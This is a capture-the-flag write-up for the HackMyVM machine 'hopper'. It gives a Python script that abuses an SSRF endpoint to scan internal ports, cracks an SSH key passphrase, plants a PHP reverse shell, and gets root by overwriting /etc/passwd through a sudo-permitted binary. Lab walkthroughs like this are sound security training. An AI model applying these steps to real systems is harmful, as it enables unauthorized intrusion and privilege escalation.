hackmyvm: hopper

Information collected to get the first shell

PORT STATE SERVICE22/tcp open ssh80/tcp open http

Full port scan, first visit the web service.

Use gobuster to scan the directory to find the directory advanced-search, ssrf exists here.


The virtual machine has three users who can log in with bash, root, edward, henry.

After a simple test, remote file inclusion cannot be performed. It is estimated that curl_exec is called. For the ssrf utilization of php, please refer to SSRF in PHP^[1] to use it.But here is a bit special, there is no redis, no mysql, so the host port is probed.

#!/usr/bin/python3import requestsfor port in range(1,65535):res = requests.get('http://192.168.143.191/advanced-search/path.php?path=http://127.0.0.1:%d' % port)if len(res.text) == 0:continueelse:print('-----------------------')print('port %d\n' % port)print(res.text)print('-----------------------')

The new port obtained by scanning is 2222.

Followed by directory discovery, blasting the directory, and finding the existence of the directorybackup.

It was found to be a passpharse sshkey, so use john to decrypt, seeJTR (John The Ripper)'s ssh key crack record^[2], the passpharse is barcelona.

Use id_rsa to log in ssh to successfully log in useredwardGet user flag.

Switch user

Write a PHP Trojan that bounces the shell into the /var/www/html directory, and successfully obtained the user www-data.

Check that the user has sudo privileges.

Reference GTFOBins^[3], switch to user henry (note that the environment variable export TERM=xterm needs to be set before running the program).

Elevate to root

View sudo permissions for user henry.

This is relatively simple, change /etc/passwd.

Copy passwd to the tmp directory and replace x in the root user with a known encrypted password.

Then use the command [email protected]:/tmp$ sudo /usr/bin/ascii-xfr -rv /etc/passwd Write the modified passwd to /etc/passwd.Use su to successfully switch to root to get the flag.


Reference

[1] https://blog.csdn.net/bylfsj/article/details/105083164
[2] https://blog.csdn.net/qq_40490088/article/details/97812715
[3] https://gtfobins.github.io/